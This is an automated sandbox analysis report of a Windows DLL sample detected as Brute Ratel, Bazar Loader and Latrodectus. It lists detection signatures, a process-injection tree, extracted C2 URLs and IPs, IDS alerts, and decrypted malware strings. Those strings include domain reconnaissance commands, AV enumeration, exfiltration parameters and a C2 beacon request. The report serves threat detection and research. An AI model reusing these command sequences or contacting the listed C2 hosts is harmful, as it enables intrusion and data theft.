Windows Analysis Report
vierm_soft_x64.dll.dll

Overview

General Information

Sample name: vierm_soft_x64.dll.dll
(renamed file extension from exe to dll)
Original sample name: vierm_soft_x64.dll.exe
Analysis ID: 1525190
MD5: b1ca25f5bb4edd293b3711c77eb99a6f
SHA1: 178bba8686ea329b884a652fe0f8a0ae0c53d367
SHA256: 97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
Tags: BruteRatel, exe, user-k3dg3___

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • loaddll64.exe (PID: 1048 cmdline: loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6492 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 7176 cmdline: C:\Windows\system32\WerFault.exe -u -p 7148 -s 328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 3648 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7196 cmdline: C:\Windows\system32\WerFault.exe -u -p 3648 -s 316 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7376 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7412 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7468 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7504 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 320 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7596 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7736 cmdline: C:\Windows\system32\WerFault.exe -u -p 7596 -s 324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7604 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7744 cmdline: C:\Windows\system32\WerFault.exe -u -p 7620 -s 320 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7656 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Source | Rule | Description | Author | Strings
00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_2 | Yara detected BruteRatel | Joe Security |
00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |

Source | Rule | Description | Author | Strings
23.2.rundll32.exe.29f3b750000.5.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
23.2.rundll32.exe.29f3b6b0000.3.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |
23.2.rundll32.exe.29f3b750000.5.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security |

System Summary

Source: Process started, Author: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7656, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 3504, ProcessName: explorer.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T20:46:42.630626+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49773 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:45.351889+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49774 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:46.527538+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49777 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:47.547558+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49779 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:48.752248+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49780 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:49.848084+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49781 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:51.851738+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49782 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:53.264586+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49784 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:54.396842+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49787 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:55.412234+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49788 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:56.534892+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49789 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:57.584944+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49790 | 188.114.96.3 | 443 | TCP
2024-10-03T20:46:59.710024+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49793 | 188.114.96.3 | 443 | TCP
2024-10-03T20:47:00.749841+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.9 | 49795 | 188.114.96.3 | 443 | TCP

AV Detection

Source: 30.2.explorer.exe.89d0000.0.raw.unpack, Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: 30.2.explorer.exe.89d0000.0.raw.unpack, String decryptor (one decrypted string per line):
  /c ipconfig /all
  /c systeminfo
  C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe
  /c nltest /domain_trusts
  /c net view /all
  C:\Windows\System32\cmd.exe
  /c nltest /domain_trusts /all_trusts
  C:\Windows\System32\cmd.exe
  /c net view /all /domain
  &ipconfig=
  C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe
  /c net group "Domain Admins" /domain
  C:\Windows\System32\cmd.exe
  /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
  C:\Windows\System32\wbem\wmic.exe
  /c net config workstation
  C:\Windows\System32\cmd.exe
  /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
  C:\Windows\System32\cmd.exe
  /c whoami /groups
  C:\Windows\System32\cmd.exe
  &systeminfo=
  &domain_trusts=
  &domain_trusts_all=
  &net_view_all_domain=
  &net_view_all=
  &net_group=
  &wmic=
  &net_config_ws=
  &net_wmic_av=
  &whoami_group=
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &proclist=[
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &desklinks=[
  *.*
  "%s"
  Update_%x
  Custom_update
  .dll
  .exe
  Error
  runnung
  %s/%s
  front
  /files/
  Alpha
  Content-Type: application/x-www-form-urlencoded
  Cookie:
  POST
  GET
  curl/7.88.1
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  CLEARURL
  URLS
  COMMAND
  ERROR
  VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  [{"data":"
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  "}]
  &dpost=
  https://isomicrotich.com/test/
  https://opewolumeras.com/test/
  \*.dll
  AppData
  Desktop
  Startup
  Personal
  Local AppData
  Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  %s%d.dll
  C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
  <!DOCTYPE
  Content-Length: 0
  C:\WINDOWS\SYSTEM32\rundll32.exe %s
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  <html>
  Content-Type: application/dns-message
  Content-Type: application/ocsp-request
  12345
  12345
  &stiller=
  %s%d.exe
  %x%x
  &mac=
  %02x
  :%02x
  &computername=%s
  &domain=%s
  %04X%04X%04X%04X%08X%04X
  LogonTrigger
  ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  %04X%04X%04X%04X%08X%04X
  \Registry\Machine\
  TimeTrigger
  PT0H%02dM
  %04d-%02d-%02dT%02d:%02d:%02d
  PT0S
  \update_data.dat
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\explorer.exe, Code function: 30_2_089DA8E0 FindFirstFileW, FindNextFileW, LoadLibraryW, LoadLibraryExW
Source: C:\Windows\explorer.exe, Code function: 30_2_089D2B28 FindFirstFileA, wsprintfA, FindNextFileA, FindClose

Networking

Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49779 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49789 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49774 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49782 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49781 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49773 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49793 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49784 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49787 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49777 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49790 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49788 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49780 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49795 -> 188.114.96.3:443
Source: C:\Windows\System32\rundll32.exe, Network Connect: 82.115.223.39 8041
Source: C:\Windows\explorer.exe, Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe, Network Connect: 80.78.24.30 8041
Source: Malware configuration extractor, URLs: https://isomicrotich.com/test/
Source: Malware configuration extractor, URLs: https://opewolumeras.com/test/
Source: unknown, Network traffic detected: HTTP traffic on port 8041 -> 49718, 49719, 49724, 49725, 49731, 49732, 49735, 49736, 49738, 49739, 49743, 49744, 49746, 49747, 49750, 49751, 49754, 49755, 49757, 49758, 49760, 49761, 49766, 49767, 49770, 49771, 49775, 49776, 49783, 49785, 49791, 49792, 49796, 49797
                  Source: global traffic; TCP traffic: 192.168.2.9:49718 -> 80.78.24.30:8041
                  Source: global traffic; TCP traffic: 192.168.2.9:49722 -> 82.115.223.39:8041
                  Source: Joe Sandbox View; IP Address: 188.114.96.3
                  Source: Joe Sandbox View; IP Address: 82.115.223.39
                  Source: Joe Sandbox View; IP Address: 80.78.24.30
                  Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View; ASN Name: MIDNET-ASTK-TelecomRU
                  Source: Joe Sandbox View; ASN Name: CYBERDYNELR
                  Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global traffic; HTTP traffic detected:
                    POST /test/ HTTP/1.1
                    Accept: */*
                    Content-Type: application/x-www-form-urlencoded
                    Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                    Host: isomicrotich.com
                    Content-Length: 92
                    Cache-Control: no-cache
                  Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\explorer.exe; Code function: 30_2_089D5078 InternetReadFile,30_2_089D5078
                  Source: global traffic; DNS traffic detected: DNS query: tiguanin.com
                  Source: global traffic; DNS traffic detected: DNS query: greshunka.com
                  Source: global traffic; DNS traffic detected: DNS query: bazarunet.com
                  Source: global traffic; DNS traffic detected: DNS query: isomicrotich.com
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
                  Source: explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/vi
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/~i
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/)
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/0
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/E
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/M
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php1
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpQ
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpad
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpn
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpo
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php.
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpad
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpy
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/net.com:8041/0
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
